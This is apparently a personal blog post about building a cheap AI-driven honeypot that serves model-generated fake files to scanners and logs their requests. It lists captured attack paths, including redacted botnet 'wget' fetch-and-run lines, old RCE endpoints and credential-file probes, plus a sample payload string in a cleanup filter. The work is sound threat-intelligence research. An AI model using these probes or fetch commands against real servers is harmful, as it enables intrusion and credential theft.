The Most Annoying Honeypot

Ben Lampere
May 11

Most malicious scanners are looking for real vulnerabilities and leaks, so I gave them as much as they could ask for. With the help of AI, you can generate almost any requested data nearly instantly. With a single ChatGPT/Claude subscription and a DigitalOcean instance, the most annoying honeypot was possible.

Back in 2023, I bought a .zip domain name when they first came out. There was a lot of buzz that these domains would be used almost exclusively for malicious activity, given the name's similarity to the popular file compression extension. That's when I set up my first honeypot.

This time I wanted to revisit the idea with two goals: to see what role AI could play in a honeypot, and to steal the enumeration wordlists that malicious users were actually using. To do that, I needed to keep them engaged as long as possible.

If you go back and read the original article, it was a small project, mostly a simple script that returned different payloads and 200 responses for whatever URL you hit. I got a handful of results: some scanning, some attack attempts, but traffic quickly died off.

Scanners and hackers today are smarter. They use automation to perform scans and attacks at scale. A blank page with a 200 response just isn't going to cut it. When an attacker is enumerating for configuration files, they want to actually see a configuration file. So why not give them exactly what they're looking for? AI turns out to be perfect for the job.

I built a honeypot that gives hackers exactly what they're after. The system is fairly simple on the surface. The first time a user hits any URL, it responds with a 200, 500, or 403. If they're lucky, it spits out actual content. What's happening in the background is what makes it smart.

Once the server receives a URL, that path gets sent to ChatGPT with the prompt: "Return exactly what the user would be expecting if visiting this URL; return only the content, nothing else." The honeypot uses the GPT-4o API, though any model capable of generating plausible file content would work. Because AI can be slow and there's sometimes a backlog of pages to process, I don't serve the generated content on the first hit. Instead, I cache the response and serve it the next time that page is requested. The queue-based approach also kept rate limiting from becoming an issue, and over time the cache absorbed more and more of the traffic.
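A minimal sketch of that first-hit-then-cache flow, not the actual app.py. The class name LazyResponseCache, the build_prompt helper, and the fake_generate stand-in for the model call are all hypothetical; a real version would replace fake_generate with a call to whichever model API you use.

```python
import queue
import random
import threading

# Prompt text quoted from the post; how the URL is appended is an assumption.
PROMPT = ("Return exactly what the user would be expecting if visiting this URL; "
          "return only the content, nothing else.")

DECOY_STATUSES = (200, 500, 403)  # possible first-hit responses


def build_prompt(path):
    return f"{PROMPT}\nURL: {path}"


class LazyResponseCache:
    """Serve a decoy on the first hit, queue generation, serve cached content later."""

    def __init__(self, generate):
        self._generate = generate      # callable(prompt) -> str, hypothetical model wrapper
        self._cache = {}               # path -> generated body
        self._pending = set()          # paths already queued, to avoid duplicate jobs
        self._jobs = queue.Queue()
        self._lock = threading.Lock()

    def handle(self, path):
        """Return (status, body) for a request path."""
        with self._lock:
            if path in self._cache:
                return 200, self._cache[path]
            if path not in self._pending:
                self._pending.add(path)
                self._jobs.put(path)
        return random.choice(DECOY_STATUSES), ""

    def work_once(self):
        """Generate one queued page; a real server would loop this in a worker thread."""
        path = self._jobs.get()
        body = self._generate(build_prompt(path))
        with self._lock:
            self._cache[path] = body
            self._pending.discard(path)
        self._jobs.task_done()


def fake_generate(prompt):
    # Placeholder for the model call: echoes the requested URL back.
    return "# generated for " + prompt.rsplit("URL: ", 1)[-1] + "\n"


cache = LazyResponseCache(fake_generate)
first_status, first_body = cache.handle("/.env.production")    # decoy, job queued
cache.work_once()                                              # background generation
second_status, second_body = cache.handle("/.env.production")  # served from cache
```

Processing jobs one at a time from a queue is what keeps the request rate to the model bounded, at the cost of the first visitor to each path never seeing the generated file.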

This method worked quite well. Watching the logs, I could see attackers first enumerating endpoints to confirm services were running, then returning to probe deeper. Convincing configuration files led to further enumeration, which helped capture more endpoints and grow the wordlist.

To drive as much traffic to the site as possible, I needed to do a little setup.

First, the server needed a real certificate, since many scanners skip sites with self-signed certificates by default. I was on a budget, so a free Let's Encrypt certificate did the job.
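For reference, here is a rough sketch of how a Python server could load a Let's Encrypt certificate. It assumes the certificate was issued with certbot, which by default stores files under /etc/letsencrypt/live/<domain>/; the helper names cert_paths and make_tls_context are hypothetical and not taken from the project.

```python
import ssl
from pathlib import Path

# certbot's default location for issued certificates (assumed setup)
LETSENCRYPT_LIVE = Path("/etc/letsencrypt/live")


def cert_paths(domain):
    """Return (certificate chain, private key) paths for a domain."""
    live = LETSENCRYPT_LIVE / domain
    return live / "fullchain.pem", live / "privkey.pem"


def make_tls_context(domain):
    """Build a server-side TLS context; fails if the files do not exist."""
    certfile, keyfile = cert_paths(domain)
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.load_cert_chain(certfile=str(certfile), keyfile=str(keyfile))
    return ctx


chain, key = cert_paths("example.com")
```

The resulting context can wrap a listening socket with ctx.wrap_socket(sock, server_side=True).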

From there, I needed to be a little reckless on purpose. Malicious users are constantly hunting for poor security hygiene, so I needed to leave some breadcrumbs. I created a repo on my GitHub page and had Claude generate an entire fake project: README files, Docker Compose files, Makefiles, and more. The centerpiece was a configuration file containing the holy grail of leaked credentials, all pointing directly back to the honeypot.

Feel free to take a look: https://github.com/Sheepwiz/app_config

Note: all credentials in this repo are fake and point only to the honeypot.

I then posted that configuration file as irresponsibly as possible on Pastebin, Ghostbin, and whatever other sketchy alternatives I could find. I can't attribute traffic precisely to each source, but I did see a noticeable spike after the GitHub repo went live. With my fake credentials scattered across the internet, I sat back and watched the logs.

The goal was to build a wordlist from real attack traffic, so I only tracked unique requests. The script generates three files:

capture_requests.txt - the wordlist of each unique request
capture_requests_full.txt - full requests with IP address and headers for analytics
response_cache/ - every AI-generated response
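Tracking only unique requests could look something like the sketch below. The two file names come from the list above; the RequestCapture class and the JSON-lines layout of the full log are assumptions, since the post does not describe the actual format.

```python
import json
import tempfile
from pathlib import Path


class RequestCapture:
    """Append each new request path to a wordlist and a detailed log."""

    def __init__(self, out_dir):
        self.out_dir = Path(out_dir)
        self.out_dir.mkdir(parents=True, exist_ok=True)
        self.wordlist = self.out_dir / "capture_requests.txt"
        self.full_log = self.out_dir / "capture_requests_full.txt"
        self.seen = set()
        # Reload earlier captures so restarts do not create duplicates.
        if self.wordlist.exists():
            self.seen.update(self.wordlist.read_text(encoding="utf-8").splitlines())

    def record(self, path, ip, headers):
        """Log the request if its path is new; return True when it was new."""
        if path in self.seen:
            return False
        self.seen.add(path)
        with self.wordlist.open("a", encoding="utf-8") as f:
            f.write(path + "\n")
        with self.full_log.open("a", encoding="utf-8") as f:
            # One JSON object per line (assumed format)
            f.write(json.dumps({"path": path, "ip": ip, "headers": headers}) + "\n")
        return True


with tempfile.TemporaryDirectory() as tmp:
    capture = RequestCapture(tmp)
    first = capture.record("/.git/HEAD", "203.0.113.7", {"User-Agent": "curl/8.0"})
    repeat = capture.record("/.git/HEAD", "203.0.113.8", {})
    wordlist_lines = capture.wordlist.read_text(encoding="utf-8").splitlines()
```

Deduplicating on the path alone means a second IP requesting the same URL is not logged, which fits the goal of building a wordlist rather than a full traffic record.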

So what did the data look like? The findings break down into five categories:

Thousands of Spray and Prays: The majority of attacks were broad, untargeted exploit sprays. The sheer volume makes it clear this is almost entirely automated. Any public-facing server, no matter how obscure, will be probed within hours of going live.

/hudson - Jenkins probing
/ReportServer - Microsoft reporting services
/actuator/health - Spring Boot
/adminer.php - DB admin tool
/telescope - Laravel debug panel

Credential Theft: There was massive enumeration of sensitive files: environment configs, AWS credential files, and deployment secrets. This highlights how a single exposed config file can be more damaging than a sophisticated exploit, since credentials require no technical skill to abuse.

/.env.production - environment secrets
/.git/credentials - stored Git auth
/config/aws.js - cloud config leakage
/sftp-config.json - deployment credentials
/.aws/policies - IAM policy exposure attempts

Botnet Attacks: Botnet traffic continues to saturate the internet, mostly targeting older IoT device vulnerabilities. The persistence of these attacks shows that unpatched IoT devices remain a serious and largely ignored attack surface, years after these vulnerabilities were first disclosed.

/shell?...wget http://X.XX.XXX.XX/.../kbotne7
/cgi-bin/shortcut_telnet.cgi?...kbotne7

Old and New Vulnerabilities Coexist: I saw a mix of fresh and ancient exploits side by side: the 2017 PHPUnit RCE showing up alongside a Next.js vulnerability that dropped earlier this year. The takeaway is that patching new CVEs isn't enough. Attackers are still profitably running exploits from nearly a decade ago, meaning old vulnerabilities never truly retire.

/vendor/phpunit/.../eval-stdin.php - PHPUnit RCE
/index.php?s=/index/...invokefunction - ThinkPHP RCE chain
/cgi-bin/luci/ - TP-Link router injection
/boaform/admin/formLogin - IoT/web admin brute force

Attacks from the Repo Leak: This group came directly from the endpoints I leaked via the GitHub repo. Usernames and passwords were sprayed across various endpoints in an attempt to gain access, representing a more targeted wave of traffic compared to the organic scanner noise.

/.git/HEAD - repo exposure
/graphql - GraphQL endpoint probing
/debug/default/view - debug panel access
/api/v1/auth/login - API login endpoint
/cron/backup-database - backup script
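A first pass at sorting captured paths into these five groups can be done with simple substring rules. The sketch below is illustrative only: the RULES table is built from the example paths in this post, the labels and the classify function are hypothetical, and real traffic would need many more patterns plus manual review.

```python
from collections import Counter

# (label, substrings) pairs checked in order; the first match wins.
RULES = [
    ("botnet", ("/shell?", "wget ", "shortcut_telnet.cgi")),
    ("known exploit", ("eval-stdin.php", "invokefunction", "/cgi-bin/luci", "/boaform/")),
    ("credential theft", ("/.env", "/.git/credentials", "/.aws/",
                          "sftp-config.json", "/config/aws.js")),
    ("repo leak", ("/.git/HEAD", "/graphql", "/debug/default/view",
                   "/api/v1/auth/login", "/cron/backup-database")),
    ("spray and pray", ("/hudson", "/ReportServer", "/actuator/",
                        "/adminer.php", "/telescope")),
]


def classify(request_path):
    """Return the first matching category label, or 'uncategorized'."""
    for label, needles in RULES:
        if any(needle in request_path for needle in needles):
            return label
    return "uncategorized"


sample = ["/.env.production", "/hudson", "/graphql", "/boaform/admin/formLogin", "/robots.txt"]
tally = Counter(classify(p) for p in sample)
```

Path matching alone cannot prove that a request came from the leaked repo, so the "repo leak" label here only flags endpoints that were advertised there.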

I started this project in January and pulled the data in late April. In that time, I collected 3,065 unique endpoints from 287 unique IP addresses.

There are far more advanced honeypots out there, but this was an interesting experiment in building something lightweight and cheap that still captures a meaningful picture of what's actively being scanned on the internet. If you're getting started with a homelab and curious about threat intelligence, this is a surprisingly accessible starting point.

If you want to set up this honeypot yourself, check out my GitHub below.

https://github.com/Sheepwiz/Most-Annoying-Honeypot

The setup is simple. Here are the quick steps to get it running yourself.

Pick a basic Ubuntu Linux instance on DigitalOcean
Install the following

apt update && apt upgrade -y
apt install -y python3 python3-pip openssl nodejs npm
pip3 install pyopenssl
npm install -g @openai/codex

codex auth login

Move the Python scripts to the server

scp app.py root@<your-droplet-ip>:/root/honeypot/

Run the script, replacing the domain with one you own

sudo HONEYPOT_DOMAIN=hamulus.xyz python3 app.py

No matter how small your website is, it can still be attacked. Within minutes of the website going live, I saw attacks come in. A misconfigured site can get targeted quickly if everything isn't locked down from the start. Known vulnerabilities also get scanned almost immediately once proof-of-concept code becomes publicly available. If you've never had a chance to analyze live logs, this is a great way to get started.

Once the project wrapped up, I cleaned up the wordlist and removed all the requests that contained actual payloads. I then incorporated this wordlist into my bug bounty bot as an alternative to other popular wordlists. Remember that the key to offensive security is to look where other people aren't, and a custom wordlist gives you that edge.
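The cleanup step can be approximated with a small filter like the one below. This is a sketch under assumptions, not the script I used: the PAYLOAD_HINTS pattern is a hypothetical heuristic that treats query strings, shell metacharacters, percent-encoding, embedded URLs, and whitespace as signs of a payload.

```python
import re

# Heuristic markers of an attack payload rather than a plain path (assumed rules)
PAYLOAD_HINTS = re.compile(r"[?;|`$<>(){}]|%[0-9a-fA-F]{2}|\s|https?://")


def clean_wordlist(entries):
    """Drop blank, duplicate, and payload-bearing entries, keeping first-seen order."""
    seen = set()
    cleaned = []
    for entry in entries:
        entry = entry.strip()
        if not entry or PAYLOAD_HINTS.search(entry):
            continue
        if entry not in seen:
            seen.add(entry)
            cleaned.append(entry)
    return cleaned


raw = [
    "/.env.production",
    "/shell?cd /tmp; wget http://example.invalid/x",
    "/actuator/health",
    "/.env.production",
    "",
]
wordlist = clean_wordlist(raw)
```

A filter this strict also discards legitimate paths that carry query parameters, so it is worth skimming the rejected entries before throwing them away.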
